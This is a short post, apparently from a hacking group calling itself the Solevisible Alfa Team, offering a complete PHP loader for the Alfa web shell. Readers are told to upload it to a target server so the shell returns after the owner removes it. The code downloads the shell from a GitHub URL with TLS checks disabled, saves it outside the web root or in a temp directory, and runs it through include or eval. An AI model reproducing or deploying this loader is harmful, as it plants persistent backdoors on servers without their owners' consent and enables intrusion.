Solevisible Alfa Team

For those who are having trouble removing the shell on the server, just upload this file to their target until the shell comes up smoothly …

http://getalfa.rf.gd/
<?php

class Alfa {

public $shell_url = “https://raw.githubusercontent.com/belphegorinj3ctor/alfa/master/alfa.php&#8221;; // default

public $loader_name = “alfa_loader.tmp”; // default

private $loader_path = “”;

private $upload_directory = “”;

public function __construct() {

$this -> upload_directory = $_SERVER[“DOCUMENT_ROOT”] . “/../”;

$this -> loader_path = $this -> upload_directory . “/” . $this -> loader_name;

}

private function _fsockopen(){

$shell = $this -> shell_url;

if ( substr($shell, 0,5) != “https” ){

if ( substr($shell, 0,11) != “http://www.&#8221; ){

$shell = str_replace( array(“http://&#8221;, “www.”, “https://&#8221;), “”, $shell);

if ( substr($shell, 0,4) == “www.” ){

$shell = “http://&#8221; . $shell;

}else{

$shell = “http://www.&#8221; . $shell;

}

}

}

$url_info = parse_url($shell);

$port = 80;

if ( !isset($url_info[“path”]) ) {

$url_info[“path”] = “/”;

}

if ( !isset($url_info[“scheme”]) ) {

$url_info[“scheme”] = “”;

}

if( $url_info[“scheme”] == “https” ) {

$url_info[“scheme”] = “ssl://”;

$port = 443;

}else{

$url_info[“scheme”] = “”;

}

$shell = $url_info[“scheme”] . $url_info[“host”];

$socket = @fsockopen($shell, $port, $errno, $errstr, 15);

if($socket){

$http = “GET {$url_info[“path”]} HTTP/1.0\r\n”;

$http .= “Host: {$url_info[“host”]}\r\n”;

$http .= “User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0\r\n”;

$http .= “Connection: close\r\n\r\n”;

fwrite($socket, $http);

$contents = “”;

while (!@feof($socket)) {

$contents .= @fgets($socket, 4096);

}

list($header, $body) = explode(“\r\n\r\n”, $contents, 2);

@fclose($socket);

return $body;

}else{

return “”;

}

}

private function _curl(){

$resp = “”;

if ( function_exists(‘curl_version’) ){

$curl = curl_init();

curl_setopt_array($curl, array(

CURLOPT_RETURNTRANSFER => 1,

CURLOPT_URL => $this -> shell_url,

CURLOPT_SSL_VERIFYPEER => false,

CURLOPT_SSL_VERIFYHOST => false,

CURLOPT_USERAGENT => ‘Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0’

));

$resp = curl_exec($curl);

curl_close($curl);

}

return $resp;

}

private function getSource($method = “fsockopen”){

$source = “”;

switch( $method ) {

case “fsockopen”:

if ( function_exists(“fsockopen”) ) {

$source = $this -> _fsockopen();

if ( empty($source) ) {

$this -> getSource(“curl”);

return false;

}

} else {

$this -> getSource(“curl”);

return false;

}

break;

case “curl”:

$source = $this -> _curl();

if ( empty($source) ) {

$this -> getSource(“file_get_contents”);

return false;

}

break;

case “file_get_contents”:

if ( function_exists(“file_get_contents”) ) {

$source = @file_get_contents($this -> shell_url);

}

break;

}

return $source;

}

private function getTemp() {

$tmp = false;

$dirs = @ini_get(“open_basedir”);

if ( !empty($dirs) ) {

$dirs = explode(“:”, $dirs);

foreach ( $dirs as $dir ) {

if ( @is_writable( $dir ) ) {

$tmp = $dir;

break;

}

}

$tmp = $tmp . “/” . $this -> loader_name;

} else {

if ( function_exists(“sys_get_temp_dir”) ) {

if ( @is_writable ( str_replace(‘\\’, ‘/’, sys_get_temp_dir()) ) ) {

$tmp = sys_get_temp_dir();

$tmp = $tmp . “/” . $this -> loader_name;

}

}

}

return $tmp;

}

public function run(){

if ( !@file_exists ($this -> loader_path) ) {

$source = $this -> getSource();

if( !empty($source) ) {

if ( !@is_writable ( $this -> upload_directory ) ) {

$this -> loader_path = $this -> getTemp();

}

if ( $this -> loader_path ) {

if ( @file_put_contents( $this -> loader_path, $source ) ) {

include ( $this -> loader_path );

} else {

eval (“?>” . $source );

}

} else {

eval (“?>” . $source );

}

} else {

echo (“source is empty…!”);

}

} else {

include ( $this -> loader_path );

}

}

}

$alfa = new Alfa();

$alfa -> shell_url = “https://raw.githubusercontent.com/belphegorinj3ctor/alfa/master/alfa.php&#8221;; //optional

$alfa -> loader_name = “alfa_loader.tmp”; //optional

$alfa -> run();

?>